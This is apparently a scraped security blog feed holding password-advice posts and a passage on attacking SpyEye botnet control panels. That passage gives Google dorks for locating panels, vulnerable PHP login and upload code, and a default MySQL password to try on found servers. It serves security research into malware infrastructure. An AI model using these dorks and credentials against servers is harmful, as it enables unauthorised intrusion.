<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To summarize things. Use a password manager.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<h2>
General advise</h2>
</div>
<div style="text-align: justify;">
Never use your essential passwords on other computers. They might be infected with a password stealer. If you really have to use it, change the password as soon as possible on a trusted (your) computer.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Don't fool yourself by phishing sites. If you go to the local flea market, and there is a strange looking guy with "Superbank deposit here" logo above his head, will you put your money?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Protect yourself against malware. Use a recent operating system, and even if you use OSX or Linux, it is not a bad thing to have an AV as a "last line of defense". Or to check your pendrive for Windows USB worms.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Never-ever use online web sites to "generate your password", "measure the complexity of your password" or "check if it has been breached". Never! (Except if it is your password manager :) ... )<br />
<br />
Update: Sign up on the https://haveibeenpwned.com/ for notification if your e-mail is found in a leak.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Changing passwords frequently is bad advice. It is not effective. Put more energy in other right password advise. </div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-41446815509726705102014-10-01T09:17:00.000+02:002019-10-08T15:49:47.710+02:00Change passwords regularly - a myth and a lie, don't be fooled, part 1 <br />
TL;DR: different passwords have different protection requirements, and different attackers using various attacks can only be prevented through different prevention methods. Password security is not simple. For real advise, checking the second post (in progress).<br />
<br />
Are you sick of password advices like "change your password regularly" or "if your password is password change it to pa$$w0rd"? This post is for you!<br />
<br />
The news sites are full of password advises nowadays due to recent breaches. When I read/watch <a href="https://www.youtube.com/watch?v=qz5i171h_no" target="_blank">these advise (especially on CNN</a>), I am usually pissed off for a lot of reasons. Some advises are terrible (<a href="https://xato.net/passwords/the-worst-password-tips/" target="_blank">a good collection is here</a>), some are good but without solutions, and others are better, but they don't explain the reasons. Following is my analysis of the problem. It works for me. It might not work for you. Comments are welcome!<br />
<br />
<h2>
Password history</h2>
Passwords have been used since <a href="http://en.wikipedia.org/wiki/Password#History_of_passwords" target="_blank">ancient times</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLnRGYcODIkITg4AhVhUg3hnom8PrJ5NzoJPLXCa7Q8Phh4ndSCguvWFPlT0uFAEyj77hp8gfrTXq1Zpts-TrbfyB1bMrSEH-A3-SUBjMRpabINXMOlRsXKLi-EOJUJRTJHfc7ek4CFEqg/s1600/15f1ae857ca97193ffff8102ffffd524.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLnRGYcODIkITg4AhVhUg3hnom8PrJ5NzoJPLXCa7Q8Phh4ndSCguvWFPlT0uFAEyj77hp8gfrTXq1Zpts-TrbfyB1bMrSEH-A3-SUBjMRpabINXMOlRsXKLi-EOJUJRTJHfc7ek4CFEqg/s1600/15f1ae857ca97193ffff8102ffffd524.jpg" width="320" /></a></div>
<br />
Because it is simple. When I started using <a href="http://seriesandtv.com/wp-content/uploads/2013/06/the-internet.png" target="_blank">the Internet</a>, I believe I had three passwords. Windows login, webmail, and IRC. Now I have ~250 accounts/passwords to different things, like to my smartphone, to my cable company (this password can be used to change the channels on the TV), to my online secure cloud storage, to full disk encryption to start my computer, <strike>to my nude pictures</strike>, to my WiFi router, to my cloud server hosting provider, etc etc etc. My money is protected with passwords, my communication is protected with passwords/encryption, my work is protected with passwords. It is pretty damn important. But yet people tend to choose lame passwords. Pretty lame ones. Because they don't think it can be significant. But what is not essential today will be relevant tomorrow. The service you used to download music (iTunes) with the lame password will one day protect all your Apple devices, where attackers can download your backup files, <a href="http://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/all/" target="_blank">erase all your devices</a>, etc. <a href="http://lukenotricks.blogspot.nl/2010/03/8-characters-long-and-include-at-least.html" target="_blank">The seven-character and one capital rule is not enough anymore.</a> This advice is like PDF is safe to open, Java is secure. Old, outdated, untrue.<br />
<br />
Now, after this lengthy prologue, we will deep dive into the analysis of the problem, by checking what we want to protect, against whom (who is the attacker), and only after that, we can analyze the solutions. Travel with me, I promise it will be fun! ;)<br />
<br />
<h2>
What to protect?</h2>
<div>
There are different services online, and various services need different ways to protect. You don't use the same lock on your <a href="https://www.youtube.com/watch?v=EJOIjQJAL30" target="_blank">Trabant</a> as you do on your <a href="https://www.youtube.com/watch?v=j82VKi8NNsM" target="_blank">BMW</a>.<br />
<br /></div>
<div>
<h3>
Internet banking, online money</h3>
<div>
For me, this is the most vital service to protect. Luckily, most of the internet banking services use two-factor authentication (2FA), but unfortunately, not all of them offer <a href="http://en.wikipedia.org/wiki/Transaction_verification" target="_blank">transaction authorization/verification</a> with complete transactions. 2FA is not effective against malware, it just complicates the attack. Transaction authorization/verification is better, but not perfect (see <a href="http://www.kaspersky.com/about/news/virus/2011/Teamwork_How_the_ZitMo_Trojan_Bypasses_Online_Banking_Security" target="_blank">Zitmo</a>). If the access is not protected with 2FA, better choose the best password you have (long, real random, sophisticated, but we will get to this later). If it is protected with 2FA, it is still no reason not to use the best password ;) This is what I call the "very high-level password" class.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMf5J_Rba7N06aET8grGd1LMbJYNu7BFyYQ9RE22-SapxIxBCA3fAGp74qwww9GD4ux8Rwmd7jntzFDQFJCNJvGuWWr9tp-5e5_sCOnUW3tGc8vbvlrGg_DMgkvtLIft5G8Hsn1-VWNPjO/s1600/one-does-not-simply_trust_paypal.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMf5J_Rba7N06aET8grGd1LMbJYNu7BFyYQ9RE22-SapxIxBCA3fAGp74qwww9GD4ux8Rwmd7jntzFDQFJCNJvGuWWr9tp-5e5_sCOnUW3tGc8vbvlrGg_DMgkvtLIft5G8Hsn1-VWNPjO/s1600/one-does-not-simply_trust_paypal.png" width="320" /></a></div>
<br /></div>
<h3>
Credit card data</h3>
</div>
<div>
This system is pretty <strike>fucked up</strike> bad. Something has to be secret (your credit card number), but in the meantime that is the only thing to identify your credit card. It is like your username is your password. Pretty bad idea, huh? The problem is even worse with a <a href="https://twitter.com/mikko/status/236355251966468096" target="_blank">lot of different transaction types</a>, especially when the hotel asks you to fax both sides of your CC to them. Unfortunately, you can't change the password on your credit card, as there is no such thing, but <a href="http://en.wikipedia.org/wiki/3-D_Secure" target="_blank">Verified by VISA or 3-D Secure</a> with 2FA might increase the chances your credit card won't get hacked. And on a side note, I have removed the CVV numbers from my credit/debit cards. I only read it once from the card when I received it, I don't need it anymore to be printed there.<br />
And sometimes, <a href="https://twitter.com/NeedADebitCard" target="_blank">you are your own worst enemy.</a> Don't do stupid things like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0Fx3UkiEVLH-AJsWIotomaW4mXtez4HIkp22fx7nIqvmB3sfVC9IPZAxu9RmpAntFi39wb3gJ4tQuzHgvO85qo-L0_JvdpMlYCCmSimT_4NQYSycw362igx9MaHeeV3F2LBlsxQ1pJFPM/s1600/BgUWxYLCYAEkMQ6.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0Fx3UkiEVLH-AJsWIotomaW4mXtez4HIkp22fx7nIqvmB3sfVC9IPZAxu9RmpAntFi39wb3gJ4tQuzHgvO85qo-L0_JvdpMlYCCmSimT_4NQYSycw362igx9MaHeeV3F2LBlsxQ1pJFPM/s1600/BgUWxYLCYAEkMQ6.jpg" width="320" /></a></div>
<br /></div>
<h3>
</h3>
<h3>
Work related passwords (e.g. Windows domain)</h3>
<div>
This is very important, but because the attack methods are a bit different, I created this as a different category. Details later.<br />
<br /></div>
<h3>
Email, social sites (Gmail/Facebook/Twitter), cloud storage, online shopping</h3>
<div>
This is what I call the "high level password" class.</div>
<div>
Still, pretty important passwords. Some people don't understand "why would attackers put any energy to get his Facebook account?" It is simple. For money. They can use your account to spread spam all over your Facebook wall. They can write messages to all of your connections and tell them you are in trouble and send money via Western Union or Bitcoin.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZZK7JYG0GWcgLl9yLhbwzwkzfkonO8HYS7PtSz0UaFU6nWh2hSnBtA79qWv-Sb6DGjLKyBR951VU_VjJ4nVktJaG2agXNpfgV_WSDMwj7fQpPhadOTQlfhM5mBmoZSGz5cW4b1sueAcU/s1600/facebook-scam-travel1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZZK7JYG0GWcgLl9yLhbwzwkzfkonO8HYS7PtSz0UaFU6nWh2hSnBtA79qWv-Sb6DGjLKyBR951VU_VjJ4nVktJaG2agXNpfgV_WSDMwj7fQpPhadOTQlfhM5mBmoZSGz5cW4b1sueAcU/s1600/facebook-scam-travel1.jpg" /></a></div>
<br />
They can use your account in Facebook votes. Your e-mail, cloud storage is again very important. 20 years ago you also had letters you didn't want to print and put in front of the nearest store, neither want you to do that with your private photo album. On a side note, it is best to use a cloud storage where even the <a href="https://tresorit.com/" target="_blank">cloud provider admin can't access your data.</a> But in this case, with no password recovery option, better think about "alternative" password recovery mechanisms.<br />
<br /></div>
<h3>
</h3>
<h3>
Other important stuff with personal data (e.g. your name, home address)</h3>
<div>
The "medium level password" class. This is a personal preference to have this class or not, but in the long run, I believe it is not a waste of energy to protect these accounts. These sites include your favorite pizza delivery service, your local PC store, etc.<br />
<br /></div>
<h3>
</h3>
<h3>
Not important stuff</h3>
This is the category other. I usually use <a href="https://www.google.com/?q=one+time+disposable+email+service#q=one+time+disposable+email+service" target="_blank">one-time disposable e-mail</a> to these services. Used for the registration, get what I want, drop the email account. Because I don't want to spread my e-mail address all over the internet, whenever one of these sites get hacked. But still, I prefer to use different, random passwords on these sites, although this is the "low level password" class.<br />
<h2>
</h2>
<h2>
Attackers and attack methods</h2>
After categorizing the different passwords to be protected, let's look at the different attackers and attack methods. They can/will/or actively doing it now:<br />
<br />
<h3>
</h3>
<h3>
</h3>
<h3>
Attacking the clear text password </h3>
This is the most effective way of getting the password. Bad news is that if there is no other factor of protection, the victim is definitely not on the winning side. The different attack methods are:<br />
<br />
<ul>
<li>phishing sites/applications,</li>
</ul>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgajtXlB6146Lij8F8CpEHeGlDyS1Q9xGQODSgDiv7ynJigG0yq5xG8KeVWTt8cQ6EUkXH6NMeFmrF2CSvTQ9L4KaFLl8-bb2g6Dy58E99YmQsSTIcSuztR4uadwPrHHP2HoyJ9lUJhi57n/s1600/World-of-Tanks-Hack-5.0.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgajtXlB6146Lij8F8CpEHeGlDyS1Q9xGQODSgDiv7ynJigG0yq5xG8KeVWTt8cQ6EUkXH6NMeFmrF2CSvTQ9L4KaFLl8-bb2g6Dy58E99YmQsSTIcSuztR4uadwPrHHP2HoyJ9lUJhi57n/s1600/World-of-Tanks-Hack-5.0.jpg" width="400" /></a></div>
<div>
<br /></div>
<ul>
<li><a href="http://beta.gadgetzz.com/2011/08/15/this-is-the-best-ever-how-a-13-year-old-tried-to-hack-a-steam-account-and-got-hacked/" target="_blank">social engineering,</a></li>
<li>malware running on the computer (or <a href="http://www.computerworld.com/article/2492866/desktop-apps/researcher-to-demonstrate-feature-rich-malware-that-works-as-a-browser-extension.html" target="_blank">in the browser</a>), </li>
<li><a href="https://www.youtube.com/watch?v=t9BxB3dO0KQ" target="_blank">shoulder surfing</a> (check out for smartphones, hidden cameras), </li>
<li>sniffing clear-text passwords when the website is not protected with SSL,</li>
<li><a href="http://www.hacking-tutorial.com/hacking-tutorial/break-ssl-protection-using-sslstrip-and-backtrack-5/" target="_blank">SSL MiTM</a>,</li>
<li>rogue website administrator/hacker logging clear text passwords,</li>
<li>password reuse - if the attacker can get your password in any way, and you reuse it somewhere else, that is a problem,</li>
<li>you told your password to someone and he/she will misuse it later,</li>
<li><a href="http://www.keyghost.com/USB-Keylogger.htm" target="_blank">hardware keyloggers,</a></li>
<li>etc.</li>
</ul>
<br />
The key thing here is that no matter how long your passwords are, no matter how complex it is, no matter how often do you change it (except when you do this every minute ... ), if it is stolen, you are screwed. 2FA might save you, or might not.<br />
<br />
<h3>
</h3>
<h3>
</h3>
<h3>
Attacking the encrypted password </h3>
This is the usual "hack the webserver (via SQL injection), dump the passwords (with SQLMap), post hashes on pastebin, everybody <a href="http://www.networkworld.com/article/2172637/lan-wan/nvidia-exploit-could-turn-render-farms-into-password-crackers--bitcoin-miners--researchers-c.html" target="_blank">starts the GPU farm</a> to crack the hashes" scenario. This is basically the only scenario where the password policies makes sense. In this case the different level of passwords need different protection levels. In some cases, this attack turns out to be the same as the previous attack, when the passwords are not hashed, or are just encoded.<br />
<br />
The current hash cracking speeds for hashes without any iterations (this is unfortunately very common) renders passwords like Q@tCB3nx (8 character, upper-lowercase, digit, special characters) useless, as those can be cracked in hours. Don't believe me? Let's do the math.<br />
<br />
Let's say your password is truly random, and randomly choosen from the 26 upper, 26 lower, 10 digit, 33 special characters. (Once I tried special passwords with high ANSI characters inside. It is a terrible idea. Believe me.). There are 6 634 204 312 890 620 different, 8 character passwords from these characters. Assuming a <a href="http://passwords12.at.ifi.uio.no/Jeremi_Gosney_Password_Cracking_HPC_Passwords12.pdf" target="_blank">2 years-old password cracking rig</a>, and MD5 hash cracking with 180 G/s speed, it takes a worst case 10 hours (average 5) to crack the password, <strike>including upgrading your bash to the latest, but still vulnerable bash version.</strike> Had the password been 10 characters long, it would take 10 years to crack with today hardware. But if the password is not truly random, <a href="http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/" target="_blank">it can be cracked a lot sooner</a>. <br />
<br />
A lot of common hashing algorithms don't use protections against offline brute-force attacks. This includes LM (old Windows hashes), NTLM (modern Windows hashes), MD-5, SHA1-2-512. These hashing algorithms were not developed for password hashing. They don't have salting, iterations, etc. out of the box. In the case of LM, the problem is even worse, as it converts the lowercase characters to uppercase ones, thus radically decreasing the key space. Out of the box, these hashes are made for fast calculation, thus support fast brute-force.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsRt68nC1dinnh3SSqeE2CPqr9m89SSduc4C8Ufor9QljMPS2JQb_0XRlz6KYKZ1fZbqd__tweLYpdJt27jnzjYtnRk75bysGKx7k66oYQZ9iL1uoI1AbUoJd3vZCU9kBDOcyqQok5fA22/s1600/rig.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsRt68nC1dinnh3SSqeE2CPqr9m89SSduc4C8Ufor9QljMPS2JQb_0XRlz6KYKZ1fZbqd__tweLYpdJt27jnzjYtnRk75bysGKx7k66oYQZ9iL1uoI1AbUoJd3vZCU9kBDOcyqQok5fA22/s1600/rig.png" width="320" /></a></div>
<br />
Another attack is when the protected thing is not an online service, but rather an encrypted file or crypto-currency wallet.<br />
<br />
<h3>
</h3>
<h3>
</h3>
<h3>
Attacking the authentication system online</h3>
<div>
This is what happened in the recent iCloud hack (besides phishing). Attackers were attacking the authentication system, by either brute-forcing the password, or bypassing the password security by answering the security question. Good passwords can not be brute-forced, as it takes ages. Good security answers have nothing to do with the question in first place. A good security answer is as hard to guess as the password itself. If password recovery requires manual phone calls, I know, it is a bit awkward to say that your first dog name was Xjg.2m`4cJw:V2= , but on the other hand, no one will guess that!<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGBSx71Kf9goDAxwfXLx6TlKZkpIVHhJtqOL5vedlDYXPJjkIbiIsFyoxGJGGMud1iONimRLGpqRPqk7yUeQejPSOpFRHAlRtGM584yyKkAYJ3AgG6lJkttofIntxxAaYveIEWXSmUA2jk/s1600/sec_questions.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGBSx71Kf9goDAxwfXLx6TlKZkpIVHhJtqOL5vedlDYXPJjkIbiIsFyoxGJGGMud1iONimRLGpqRPqk7yUeQejPSOpFRHAlRtGM584yyKkAYJ3AgG6lJkttofIntxxAaYveIEWXSmUA2jk/s1600/sec_questions.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<h3>
</h3>
<h3>
Attacking single sign on</h3>
</div>
<div>
This type of attack is a bit different, as I was not able to put the "<a href="http://en.wikipedia.org/wiki/Pass_the_hash" target="_blank">pass the hash</a>" attacks anywhere. Pass the hash attack is usually found in Windows domain environments, but others might be affected as well. The key thing is single sign on. If you can login to one system (e.g. your workstation), and access many different network resources (file share, printer, web proxy, e-mail, etc.) without providing any password, then something (a secret) has to be in the memory which can be used to to authenticate to the services. If an attacker can access this secret, he will be able to access all these services. The key thing is (again) it does not matter, how complex your passwords are, how long it is, how often do you change, as someone can easily misuse that secret.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimkhLtVDo_giOaVVrantzMq8fDbXAu173ZQX4bDmN8GNjUoHEg8gLSam6aw3lmJ1TePsVRXOOGE__d2rEYsMhyphenhyphenWWjlUnrxDv0pyl21DH6fsGkktml2ogitf7hP9M4NAH6AQ9R5Sd_M04SP/s1600/passthehash.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimkhLtVDo_giOaVVrantzMq8fDbXAu173ZQX4bDmN8GNjUoHEg8gLSam6aw3lmJ1TePsVRXOOGE__d2rEYsMhyphenhyphenWWjlUnrxDv0pyl21DH6fsGkktml2ogitf7hP9M4NAH6AQ9R5Sd_M04SP/s1600/passthehash.jpg" width="320" /></a></div>
<h3>
</h3>
<h3>
</h3>
<h3>
</h3>
<h3>
Attacking 2FA</h3>
<div>
As already stated, 2 factor authentication raises the efforts from an attacker point of view, but does not provide 100% protection. </div>
<div>
<ul>
<li>one time tokens (SecurID, Yubikey) can be relayed in a <a href="https://www.youtube.com/watch?v=Bf2nYkn32DM" target="_blank">man-in-the-middle attack</a>, </li>
<li><a href="http://www.computerworld.com/article/2493077/malware-vulnerabilities/proof-of-concept-malware-can-share-usb-smart-card-readers-with-attackers-ove.html" target="_blank">smartcard authentication can be relayed</a> with the help of a malware to the attacker machine - or simply circumvented in the browser malware, </li>
<li>text based (SMS) messages can be stolen by <a href="http://www.kaspersky.com/about/news/virus/2011/Teamwork_How_the_ZitMo_Trojan_Bypasses_Online_Banking_Security" target="_blank">malware</a> on the smartphone or rerouted via SS7, </li>
<li>bio-metric protection is constantly <a href="http://www.ccc.de/en/updates/2013/ccc-breaks-apple-touchid" target="_blank">bypassed</a>,</li>
<li>SSH keys are constantly <a href="https://www.venafi.com/blog/post/i-hunt-sys-admins-ssh" target="_blank">stolen</a>,</li>
<li>but U2F keys are pretty good actually, even though BGP/DNS hijack or similar MiTM can still circumvent that protection,</li>
<li>etc. </li>
</ul>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx9dXS1Lb2yi9jTiDhhd_kYX2lik68Kt502iHvrkOET-XXH31TFZCTNgsCNYTqFqBeIDwZi0BWN9iOJddnjvQHDCoEJb889ca3lWh1rNfc4sELthydd5lgGztTm5Pnf8Zotg4T2chjqWGQ/s1600/asps1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx9dXS1Lb2yi9jTiDhhd_kYX2lik68Kt502iHvrkOET-XXH31TFZCTNgsCNYTqFqBeIDwZi0BWN9iOJddnjvQHDCoEJb889ca3lWh1rNfc4sELthydd5lgGztTm5Pnf8Zotg4T2chjqWGQ/s1600/asps1.png" /></a></div>
<div>
<br /></div>
</div>
<h3>
</h3>
<h3>
Others</h3>
Beware that there are tons of other attack methods to access your online account (like XSS/CSRF), but all of these have to be handled on the webserver side. The best you can do is to choose a website where the Bug Bounty program is running 24/7. Otherwise, the website may be full of low hanging, easy-to-hack bugs.<br />
<br />
Now that we have covered what we want to protect against what, in the <a href="http://jumpespjump.blogspot.com/2014/10/change-passwords-regularly-myth-and-lie_13.html" target="_blank">next blog post</a>, you will see how to do that. Stay tuned. I will also explain the title of this blog post.Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-72261525536597082014-08-22T19:09:00.000+02:002019-10-08T15:53:28.755+02:00Attacking financial malware botnet panels - SpyEye<div style="text-align: justify;">
This is the second blog post in the "Attacking financial malware botnet panels" series. After playing with <a href="http://jumpespjump.blogspot.com/2014/02/attacking-financial-malware-botnet.html" target="_blank">Zeus</a>, my attention turned to another old (and dead) botnet, SpyEye. From an ITSEC perspective, SpyEye shares a lot of vulnerabilities with Zeus. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following report is based on SpyEye 1.3.45, which is old, and if we are lucky, the whole SpyEye branch will be dead soon. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Google dorks to find SpyEye C&C server panel related stuff:</div>
<br />
<ul>
<li style="text-align: justify;">if the img directory gets indexed, it is rather easy, search for e.g. inurl:b-ftpbackconnect.png</li>
<li style="text-align: justify;">if the install directory gets indexed, again, easy, search for e.g. inurl:spylogo.png</li>
<li style="text-align: justify;">also, if you find a login screen, check the css file (style.css), and you see #frm_viewlogs, #frm_stat, #frm_botsmon_country, #frm_botstat, #frm_gtaskloader and stuff like that, you can be sure you found it</li>
<li style="text-align: justify;">otherwise, it is the best not to Google for it, but get a SpyEye sample and analyze it</li>
</ul>
And this is how the control panel login looks like, nothing sophisticated:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUpS5IXNcNyAgCctc9PhOffHsfrF-zf6bQYEr3_GvCAhyphenhyphenSEP5QPf1CPf5UklmuDu3YwcnfJhyRXwLlzkGkJmxw6KXBUVNgjGy8zB5qLu8vNqMzmibRF7noeGXWNBCy3hqqoxWHJ4Hnw_Ob/s1600/sc01.png" style="margin-left: 1em; margin-right: 1em;"><img align="center/" border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUpS5IXNcNyAgCctc9PhOffHsfrF-zf6bQYEr3_GvCAhyphenhyphenSEP5QPf1CPf5UklmuDu3YwcnfJhyRXwLlzkGkJmxw6KXBUVNgjGy8zB5qLu8vNqMzmibRF7noeGXWNBCy3hqqoxWHJ4Hnw_Ob/s1600/sc01.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The best part is that you don't have to guess the admin's username ;)<br />
<br /></div>
<div style="text-align: justify;">
This is how an average control panel looks like:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5tAd2OoWOw94V142QVw6XV7n2RS9sCwzQYkZCJ_e0gwNUNg7FGmRLO1aK0Be1iFUQtCKgMozk9wlSIrHUejqj5t8Suh1_x6uVPJ8sTo3WcM0GtbxfEqa4svxmPwUjoxazHyKSsC2hH7w2/s1600/sc02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5tAd2OoWOw94V142QVw6XV7n2RS9sCwzQYkZCJ_e0gwNUNg7FGmRLO1aK0Be1iFUQtCKgMozk9wlSIrHUejqj5t8Suh1_x6uVPJ8sTo3WcM0GtbxfEqa4svxmPwUjoxazHyKSsC2hH7w2/s1600/sc02.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Hack the Planet! :)<br />
<br /></div>
<h3 style="text-align: justify;">
Boring vulns found (warning, an almost exact copy from the Zeus blog post)</h3>
<div>
<br /></div>
<ul>
<li style="text-align: justify;">Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies</li>
<li style="text-align: justify;">No password policy - admins can set up really weak passwords</li>
<li style="text-align: justify;">No anti brute-force - you can try to guess the admin's password. There is no default username, as there is no username handling!</li>
<li style="text-align: justify;">Password autocomplete enabled - boring</li>
<li style="text-align: justify;">Missing HttpOnly flag on session cookie - interesting when combining with XSS</li>
<li style="text-align: justify;">No CSRF protection - e.g. you can upload new exe, bin files, turn plugins on/off :-( boring. Also the file extension check can be bypassed, but the files are stored in the database, so no PHP shell this time. If you check the following code, you can see that even the file extension and type is checked, and an error is shown, but the upload process continues. And even if the error would stop the upload process, the check can be fooled by setting an invalid $uptype. Well done ...</li>
</ul>
<div style="text-align: justify;">
<pre class="prettyprint linenums lang-php"> if ($_FILES['file']['tmp_name'] && ($_FILES['file']['size'] > 0))
{
$outstr = "<br>";
set_time_limit(0);
$filename = str_replace(" ","_",$_FILES['file']['name']);
$ext = substr($filename, strrpos($filename, '.')+1);
if( $ext==='bin' && $uptype!=='config' ) $outstr .= "<font class='error'>Bad CONFIG extension!</font><br>";
if( $ext==='exe' && $uptype!=='body' && $uptype!=='exe' ) $outstr .= "<font class='error'>Bad extension!</font><br>";
switch( $uptype )
{
case 'body': $ext = 'b'; break;
case 'config': $ext = 'c'; break;
case 'exe': $ext = 'e'; break;
default: $ext = 'e';
}
$_SESSION['file_ext'] = $ext;
if( isset($_POST['bots']) && trim($_POST['bots']) !== '')
{
$bots = explode(' ', trim($_POST['bots']));
//writelog("debug.log", trim($_POST['bots']));
$filename .= "_".(LastFileId()+1);
}
if( FileExist($filename) ) $filename .= LastFileId();
$tmpName = $_FILES['file']['tmp_name'];
$fileSize = $_FILES['file']['size'];
$fileType = $_FILES['file']['type'];
## reading all file for calculating hash
$fp = fopen($tmpName, 'r');
</pre>
</div>
<ul>
<li style="text-align: justify;">Clear text password storage - the MySQL passwords are stored in php files, in clear text. Also, the login password to the form panel is stored in clear text.</li>
<li style="text-align: justify;">MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5. Just look at the pure simplicity of the login check, great work!</li>
</ul>
<div style="text-align: justify;">
<pre class="prettyprint lang-php">$query = "SELECT * FROM users_t WHERE uPswd='".md5($pswd)."'";</pre>
</div>
<div>
<ul>
<li style="text-align: justify;">ClickJacking - really boring stuff</li>
</ul>
<br />
<ul>
</ul>
<h3 style="text-align: justify;">
SQL injection</h3>
</div>
<div>
<br /></div>
<div style="text-align: justify;">
SpyEye has a fancy history of SQL injections. See details <a href="http://secniche.blogspot.hu/2011/08/blasting-spyeye-c-sql-injection-wins.html">here</a>, <a href="http://hacker-post.blogspot.hu/2013/01/pwning-spyeye-12x-and-13x.html">here</a>, <a href="http://bloz.isbox.org/2012/03/spyeye-sqlis.html">here</a>, video <a href="https://www.youtube.com/watch?v=ou-FB9MbbPM">here </a>and video <a href="https://www.youtube.com/watch?v=eCEK8S-9-q4">here</a>.<br />
<br />
It is important to highlight the fact that most of the vulnerable functions are reachable without any authentication, because these PHP files lack user authentication at the beginning of the files.<br />
<br /></div>
<div style="text-align: justify;">
But if a C&C server owner gets pwned through this vuln, it is not a good idea to complain to the developer, because after careful reading of the install guide, one can see:<br />
<br /></div>
<div style="text-align: justify;">
"For searching info in the collector database there is a PHP interface as formgrabber admin panel. The admin panel is not intended to be found on the server. This is a client application."<br />
<br /></div>
<div style="text-align: justify;">
And there are plenty of reasons not to install the formgrabber admin panel on any internet reachable server. But this fact leads to another possible vulnerability. The user for this control panel is allowed to remotely login to the MySQL database, and the install guide has pretty good passwords to be reused. I mean it looks pretty secure, there is no reason not to use that.<br />
<br />
<pre class="prettyprint lang-sql">CREATE USER 'frmcpviewer' IDENTIFIED BY 'SgFGSADGFJSDGKFy2763272qffffHDSJ';
</pre>
<br />
Next time you find a SpyEye panel, and you can connect to the MySQL database, it is worth a shot to try this password.<br />
<br />
Unfortunately the default permissions for this user is not enough to write files (select into outfile):<br />
<br />
<pre class="prettyprint">Access denied for user 'frmcpviewer' (using password: YES)</pre>
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
I also made a little experiment with this SQL injection vulnerability. I did set up a live SpyEye botnet panel, created the malware install binaries (droppers), and sent the droppers to the AV companies. And after more and more sandboxes connected to my box, someone started to exploit the SQL injection vulnerability on my server!<br />
<br /></div>
<div style="text-align: justify;">
